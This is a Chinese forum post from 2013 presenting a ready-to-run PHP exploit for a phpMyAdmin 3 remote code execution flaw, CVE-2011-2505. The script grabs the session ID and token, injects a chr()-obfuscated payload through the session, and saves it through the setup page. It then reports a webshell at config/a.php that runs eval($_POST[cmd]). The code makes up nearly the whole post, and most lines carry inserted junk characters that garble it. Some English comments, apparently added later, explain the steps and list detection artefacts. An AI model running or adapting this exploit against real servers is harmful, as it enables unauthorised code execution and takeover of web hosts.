
phpadmin3 remote code execute php版本exploit

发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:

. R  Y( w$ j  \#!/usr/bin/php- w; e, n4 C7 C. L
<?php
// Banner only: printed to stdout before any argument handling or network
// activity. The "Assigned CVE id" line carries the one identifier in the file;
// the characters trailing the id look like paste noise rather than part of it.
' Z$ d8 w, O, R8 h- o2 {- _print_r('
; B7 N9 t9 T7 D/ C3 C+---------------------------------------------------------------------------+( v( R1 {) U( b
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]; D3 f+ t, v& r
by oldjun(www.oldjun.com)
8 f0 \8 E7 M2 f3 W% ~% }welcome to www.t00ls.net
5 e; g$ K( y( e7 q; l. @mail: oldjun@gmail.com
# g1 w; P* o7 m4 F, q8 AAssigned CVE id: CVE-2011-25052 m- @2 d5 V. b5 L& i3 d" G2 P) Y. J% W
+---------------------------------------------------------------------------+0 j1 c7 h: N% j
');
% v  x, F; }" U# m: m0 x/ Z
) C1 I( S9 N2 J. H; Y5 `/**
; c8 T* J5 m" ~5 @ * working when the directory:"config" exists and is writeable.
0 }. d8 V5 H2 S6 X4 x; g**/7 t( q8 Y& _# N* z. N
' Q2 e. K' N! D
// Usage guard: two positional arguments (host, path) are required.
// `exit;` carries no status code, so a wrong invocation still returns 0 to the shell.
if ($argc < 3) {
! q% Q; ~, I$ u9 e$ U: Z    print_r('- M/ |" u- `3 l% ~: b
+---------------------------------------------------------------------------+
0 m8 m7 T2 i  D2 H3 BUsage: php '.$argv[0].' host path& V; ?6 y  ^. i! Z, P
host:      target server (ip/hostname)
3 O5 J  w* n6 m6 @# E; opath:      path to pma3' {- {9 K) p8 z+ U7 t  c
Example:! {- _" D/ V0 }2 D  Z% a/ Q3 O+ M5 a
php '.$argv[0].' localhost /pma/
* |% h% t! _5 a; w2 g1 {6 r+---------------------------------------------------------------------------+$ T9 e. f9 A# f* w
');
* H8 }7 w% K+ x" R2 p    exit;
( ^% m; z( s, `; c}
( q; q( J6 X& i( l" P. \) C" v. G8 f+ j, {( g+ U
// Raw CLI arguments, used unvalidated. $path is later prefixed verbatim to
// every request target (php_request builds $path.$url), so it must already
// carry its trailing slash, as the usage example shows.
$host = $argv[1];
6 e  }) E4 W) F& K$path = $argv[2];* c- A" Z8 h" V, E
% o* `. O, X' J: r2 t& t' c& |
/**
9 v" p( ~! u4 f! K. d * Try to determine if the directory:"config" exists8 I& N) R1 @1 I1 t, s; s$ j
**/
// Precondition probe for the writable config/ directory this chain depends on
// (see the author's note above the usage check). The test is a plain substring
// search for "404" over the whole raw response, headers and body alike:
// strpos() returns 0 for a match at offset zero, which this truthiness test
// would read as "no 404", and any other status (e.g. a 403 on a directory
// that exists but is not listable) is taken as "exists".
3 c% F1 i9 ?9 w! V' secho "[+] Try to determine if the directory:config exists....\n";
  r- r+ N( S  x4 Z: I$returnstr=php_request('config/');! D6 J- F) }, b: g* @
if(strpos($returnstr,'404')){
4 X) A4 h$ V; M8 n* H1 R/ w; Y" _% j0 O    exit("[-] Exploit Failed! The directory:config do not exists!\n");
+ d+ i" A$ {  p}5 Q: D, [4 W- x2 P5 Q
6 x+ {# a$ \* m* [
/**
& }0 P8 [' L, H8 o9 K' G0 `+ k * Try to get token and sessionid
1 ~. t3 a1 s# J9 s, x) L: ~, g**/2 K) J9 D. i. i' ?
// Harvests the phpMyAdmin session cookie value (group 1) and the CSRF token
// (group 3) from the raw index.php response with a single regex. The return
// value of preg_match() is ignored: on no match $resp is empty and the two
// assignments below raise undefined-offset notices before the truthiness
// check rejects the empty values.
echo "[+] Try to get token and sessionid....\n";5 ~6 m" c/ u5 L0 M7 S3 g) G3 ~
$result=php_request('index.php');3 W9 a2 u3 E% {9 |
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
7 f& z: K& C$ ]$token=$resp[3];
/ Y5 R' h; b( ]" c! O$sessionid=$resp[1];3 Z( D' B4 F2 P- z
if($token && $sessionid){) u) v: M7 I, F# r$ R% Z
    // NOTE(review): these two strings read "tokentoken" / "Session IDsessionid";
    // the `$token` / `$sessionid` interpolations look lost in the paste. Left as-is.
    echo "[+] tokentoken\n";
1 T- z; K  C2 S( t$ n+ k2 z6 q    echo "[+] Session IDsessionid\n";
2 W( e8 h- ^- y0 j6 R; H}else{% m# s; P7 z  y8 [3 q7 i
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
2 ^% u$ T' T; L! \! z8 _}
' P2 r$ {2 n, Z  j, @
% Y2 P. S+ o! q4 a/**/ {4 V. A5 p" Y1 Y' z( J2 c- I
* Try to insert shell into session& ~8 T  V, e# y, u! A
**/, N6 t8 N  ?" h/ p3 x1 E
// Core step of the chain: one GET to db_create.php that carries the harvested
// token, a `session_to_unset` parameter and a `_SESSION[ConfigFile][Servers]
// [...][host]` parameter whose array key closes a PHP comment and embeds an
// eval(). The chr() chain is only obfuscation of a short PHP snippet; what it
// does is visible from the checks below: write the a.php file named on the
// success line and echo the "t00ls" marker the final step searches for.
// Defender notes: `session_to_unset` and `_SESSION[` in the query string of a
// non-setup page are the observable request artefacts, and the chain still
// ends in a write under config/, which is why phpMyAdmin's setup instructions
// require removing that directory once configuration is done.
echo "[+] Try to insert shell into session....\n";
; n3 W+ Y2 C, |/ ~5 \$ _, \6 {1 S0 _php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
1 t3 L3 O7 ^: E( X# w& c7 K; L2 _% j' J8 a4 t3 y6 s# L, O4 e
/**
  q& n1 s9 S+ I6 |4 J6 `+ h * Try to create webshell& x5 S6 X* S  U- t, V* G
**/
// POST to setup/config.php with submit_save=Save, reusing the same session
// cookie so the setup script sees the session modified above. Presumably this
// is what persists the session's ConfigFile array to config/config.inc.php;
// the response is discarded and success is only inferred by the fetch below.
. p' t" h0 O4 x" {+ C' g+ Wecho "[+] Try to create webshell....\n";9 O! R/ x! x8 x( ]+ ^; Y
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
  z$ `7 J: `9 s, K* b. e6 H8 p/**
9 ^8 Z0 J1 F) }' l) i& D1 U * Try to check if the webshell was created successfully
( S8 H+ G" o* R  r2 U**/
// Verification: fetches config/config.inc.php over HTTP and looks for the
// "t00ls" marker the injected snippet echoes. strpos() truthiness again
// treats a match at offset 0 as failure. The failure branch only guesses at
// the cause (config/ missing or read-only); it cannot tell a patched target
// from a permission problem.
; m# D1 J5 B, w- H' m5 G* Jecho "[+] Try to check if the webshell was created successfully....\n";5 s% e! G1 g% |( u4 ^8 K/ X
$content=php_request('config/config.inc.php');
2 X; O( b$ f4 c  F+ ~if(strpos($content,'t00ls')){
: e9 F4 k& n3 j: K$ C    echo "[+] Congratulations! Expoilt successfully....\n";% S" A) @( j' U( h6 i# L
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";6 @4 H: d$ ^# y# Q: U6 D" g
}else{
: w* ~8 L& }2 b! m. _0 T5 t( D, |, J    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");  y8_# m2 O8 e5 x, }4 a
}
2 n, s3 d' x$ U8 a) r) H0 V& U- m
/**
 * Minimal hand-rolled HTTP client used by every step above.
 *
 * Builds a raw HTTP/1.1 request line plus headers from the script globals
 * $host and $path, sends it over a plain TCP connection to port 80 of
 * gethostbyname($host) and returns the raw response (status line, headers
 * and body concatenated, unparsed).
 *
 * @param string $url     path appended verbatim to the global $path
 * @param string $data    request body; a truthy value switches the method
 *                        to POST and adds Content-Type/Content-Length
 * @param string $cookie  raw Cookie header value, sent only when truthy
 * @return string raw response, or whatever was read before the peer closed
 *
 * Notes: no TLS and port 80 hard-coded; no explicit connect or read timeout;
 * the fputs() result is not checked and the socket is never fclose()d;
 * a failed connect prints and die()s, ending the whole script. Because the
 * conditionals use PHP truthiness, a body or cookie equal to "0" is silently
 * dropped. Every request carries the same fixed MSIE 6 User-Agent and
 * "Connection: Close", which is the stable fingerprint of this script's traffic.
 */
0 Z- H6 C6 A4 N2 H6 ofunction php_request($url,$data='',$cookie=''){' Y- r) U3 w- R1 K% @7 ~  A) V
    global  $host, $path;1 K9 u: D. s; u$ F; ]6 ?
   
    // method chosen by truthiness of $data, not by whether it was passed
8 g/ q: X- _# H    $method=$data?'POST':'GET';
8 ~$ P- f! L" B( ~   
) R  H; s( S* A; A3 p! ?    $packet = $method." ".$path.$url." HTTP/1.1\r\n";& J3 C* g* r8 z0 ^7 Z; q
    $packet .= "Accept: */*\r\n";
, y% y9 Z; z) X) m, p( @& g/ o    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
, R3 b& i' T- Z. }- F4 J! l    $packet .= "Host: $host\r\n";
) o6 J( V! ~* B+ t9 C% s  g    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
* Z' b: f4 i  e2 L# Y    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";: ~2 G% O* s" x
    $packet .= $cookie?"Cookie: $cookie\r\n":"";' T1 W! l8 _3 c% ~1 K( _
    $packet .= "Connection: Close\r\n\r\n";3 O: c" D. Z; b1 T$ v
    $packet .= $data?$data:"";' w# q' r. P# f* `
  J" g" f$ p* ^, Q, O! O- ~  |
    // plain TCP to port 80; the name is resolved here and the raw IP connected to
    $fp = fsockopen(gethostbyname($host), 80);
* h$ w: W- q9 U; i: t    if (!$fp) {0 _, Z  g1 ~/ Y' u
    echo 'No response from '.$host; die;
6 |3 C  o/ T# R9 D    }, [) E; G: r/ e1 K2 b3 ~
    fputs($fp, $packet);. p6 `0 i% |# d* D( {6 n$ I. j  |

/ W( M7 \% I: P; k2 K, G    $resp = '';
3 D" T8 Q. M$ f! X% q- h7 A7 q1 z1 R, t) D0 T0 `: H
    // reads until the server closes the connection (Connection: Close above), 1 KiB at a time
    while ($fp && !feof($fp))
! f! C& B# Q) H5 `7 a5 N        $resp .= fread($fp, 1024);4 I( }6 }  [% }) }* E5 n

4 B5 L, V6 ?. P- K2 n3 B6 y. |  e    return $resp;1 K. _$ m8 u/ b8 S& s$ X; D
}4 U; j7 ^: R% f' e( z8 s4 d
    # w) F$ N6 L* i7 f; d1 T# o$ y2 g
?>
( W0 T& V! r+ F& c- r& q.